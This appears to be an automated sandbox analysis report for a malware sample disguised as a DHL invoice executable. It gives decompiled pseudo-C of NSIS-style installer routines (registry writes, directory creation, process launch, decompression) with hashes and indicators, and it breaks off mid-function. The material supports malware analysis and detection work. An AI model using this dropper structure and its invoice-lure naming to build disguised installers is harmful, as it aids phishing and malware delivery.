Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\DHL-INVOICE-MBV.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-508787023
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64

Uniqueness

Uniqueness Score: -1.00%

Function 7411177B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E7411177B(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x7411406c = _a8;
				 *0x74114070 = _a16;
				 *0x74114074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x74114048, E741115B1);
				_push(1);
				_t37 = E74111B63();
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E74112356(_t54);
					}
					_push(_t54);
					E74112398(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E7411256D();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E741115C6(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E7411256D();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E7411256D();
							_t37 = GlobalFree(E74111272(E741115B4(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E74112530(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E7411153D( *0x74114068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E74112D2F(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E74112A74(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E74112728(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x7411177b
0x7411177b
0x7411177b
0x74111788
0x74111790
0x7411179d
0x741117ab
0x741117ae
0x741117b0
0x741117b5
0x741117ba
0x741118dc
0x741118dc
0x741117c0
0x741117c4
0x741117c7
0x741117cc
0x741117cd
0x741117ce
0x741117d4
0x741117da
0x7411180a
0x74111811
0x74111835
0x74111882
0x74111883
0x74111837
0x74111837
0x74111838
0x74111841
0x74111842
0x7411184c
0x7411184f
0x74111854
0x7411185b
0x7411185b
0x74111861
0x74111862
0x74111868
0x7411186e
0x7411187b
0x7411187c
0x7411187f
0x74111813
0x74111813
0x74111814
0x74111829
0x74111829
0x7411188d
0x74111890
0x7411189d
0x741118a4
0x741118ac
0x741118af
0x741118af
0x741118ac
0x741118bc
0x741118c4
0x741118c9
0x741118bc
0x741118d1
0x00000000
0x741118d3
0x00000000
0x741118d4
0x741118d1
0x741117de
0x741117e1
0x741117ff
0x00000000
0x00000000
0x74111802
0x74111807
0x74111807
0x74111809
0x00000000
0x74111809
0x741117e3
0x741117e4
0x741117ec
0x741117ed
0x00000000
0x741117ed
0x741117e6
0x741117e7
0x741117f5
0x00000000
0x741117f5
0x741117ea
0x00000000
0x00000000
0x00000000
0x741117ea

APIs

Part of subcall function 74111B63: GlobalFree.KERNEL32(?), ref: 74111DB6
Part of subcall function 74111B63: GlobalFree.KERNEL32(?), ref: 74111DBB
Part of subcall function 74111B63: GlobalFree.KERNEL32(?), ref: 74111DC0

GlobalFree.KERNEL32(00000000), ref: 74111829
FreeLibrary.KERNEL32(?), ref: 741118AF
GlobalFree.KERNEL32(00000000), ref: 741118D4

Part of subcall function 74112356: GlobalAlloc.KERNEL32(00000040,?), ref: 74112387

Part of subcall function 74112728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,741117FA,00000000), ref: 741127F8

Part of subcall function 741115C6: lstrcpyW.KERNEL32(?,74114020), ref: 741115DC

Strings

, xrefs: 741118B5

Memory Dump Source

Source File: 00000001.00000002.18002086592.0000000074111000.00000020.00000001.01000000.00000004.sdmp, Offset: 74110000, based on PE: true

Associated: 00000001.00000002.18002024165.0000000074110000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002166253.0000000074113000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002259835.0000000074115000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74110000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 6d7f464bad304bc98620b3a82b5a9a74a9170356bae35368890140b6f274f17d
Instruction ID: 77433c89ce49180672ce7b9ced91437c2d6c8235a4b4a81ed0a11dbd41b6be69
Opcode Fuzzy Hash: 6d7f464bad304bc98620b3a82b5a9a74a9170356bae35368890140b6f274f17d
Instruction Fuzzy Hash: 4141B472540207DADB01BF21D9C4BC6B7ACBB49311F1685B5F947AA586DB788384CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00401C1F(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C1F(3);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 - 0x10) = _t29;
				_t30 = E00402C1F(4);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x10)) = E00402C41(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C41(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402C41();
					_t32 = E00402C41();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t61 = E00402C1F();
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t41 = E00402C1F(2);
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x30) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0x30));
					E004061CB();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c1f
0x00401c21
0x00401c28
0x00401c2b
0x00401c2e
0x00401c38
0x00401c3c
0x00401c3f
0x00401c48
0x00401c48
0x00401c4b
0x00401c4f
0x00401c58
0x00401c58
0x00401c5b
0x00401c5f
0x00401c61
0x00401cb6
0x00401cb8
0x00401cc3
0x00401ccd
0x00401cd0
0x00401cd0
0x00401cd9
0x00000000
0x00401c63
0x00401c6a
0x00401c6c
0x00401c6f
0x00401c75
0x00401c7c
0x00401c7f
0x00401ca7
0x00401cdf
0x00401cdf
0x00401c81
0x00401c8f
0x00401c97
0x00401c9a
0x00401c9a
0x00401c7f
0x00401ce2
0x00401ce5
0x00401ceb
0x00402a6b
0x00402a6b
0x00402ac8
0x00402ad4

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28

Uniqueness

Uniqueness Score: -1.00%

Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004023E4(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x18));
				_t34 = __eax;
				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
				 *(_t39 - 0x3c) = E00402C41(2);
				_t20 = E00402C41(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402CD1(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402C41(0x23);
						_t24 = lstrlenW(0x40b5a8) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5a8 = E00402C1F(3);
						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E00403116( *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5a8, 0x1800);
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5a8, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
				return 0;
			}

0x004023e4
0x004023e4
0x004023e4
0x004023e7
0x004023ee
0x004023f8
0x004023fb
0x00402404
0x0040240b
0x00402412
0x00402415
0x0040241b
0x00402425
0x00402429
0x00402434
0x00402434
0x0040243b
0x00402445
0x0040244b
0x0040244e
0x0040244e
0x00402452
0x0040245e
0x0040245e
0x0040246f
0x00402477
0x00402479
0x00402479
0x0040247c
0x00402557
0x00402557
0x00402ac8
0x00402ad4

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp,00000023,00000011,00000002), ref: 0040242F
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp,00000000,00000011,00000002), ref: 0040246F
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp,00000000,00000011,00000002), ref: 00402557

Strings

C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp, xrefs: 00402420, 00402445, 00402459, 00402464

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp
API String ID: 2655323295-265066942
Opcode ID: 847708cbd3b514d62a1299f522a031eeba4315d363bde44c88245d98e5e0fde9
Instruction ID: a134a75014e9aaf936f4ed277425746fec7608ee04f1c2dd62efd2514dae3daa
Opcode Fuzzy Hash: 847708cbd3b514d62a1299f522a031eeba4315d363bde44c88245d98e5e0fde9
Instruction Fuzzy Hash: 15118471D00104BEEB10AFA5DE89EAEBA74EB44754F11803BF504B71D1D7B88D419B68

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402C41(0xfffffff0);
				_t17 = E00405C04(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405B86(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405838( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E00405855(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E004057BB( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406284(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\unclinical\\Mystificerede5\\Montia\\Sbeskummet\\Gtevielsers22",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x0040224b
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402ac8
0x00402ad4

APIs

Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,75F73420,004059B6,?,C:\Users\user\AppData\Local\Temp\,75F73420,00000000), ref: 00405C12
Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 004057BB: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22, xrefs: 00401640

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22
API String ID: 1892508949-3066316029
Opcode ID: f016b00615f9d65ee3458270e5d489e8c8114c99f0c06642e4f3a09aec43fc39
Instruction ID: cdbb32f604e1e97b4505581c5a6dce2e2be8be56f1f537164db10111f90f244e
Opcode Fuzzy Hash: f016b00615f9d65ee3458270e5d489e8c8114c99f0c06642e4f3a09aec43fc39
Instruction Fuzzy Hash: 5911D031504501EBCF30BFA4CD4199F36A0EF14329B29493BFA45B22F1DB3E49519A5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040586D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040586D(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4266f0->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x4266f0,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405876
0x00405896
0x0040589e
0x004058a3
0x00000000
0x004058a9
0x004058ad

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
CloseHandle.KERNEL32(?), ref: 004058A3

Strings

Error launching installer, xrefs: 00405880

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78

Uniqueness

Uniqueness Score: -1.00%

Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00406DC3() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407231))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4)); // executed
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
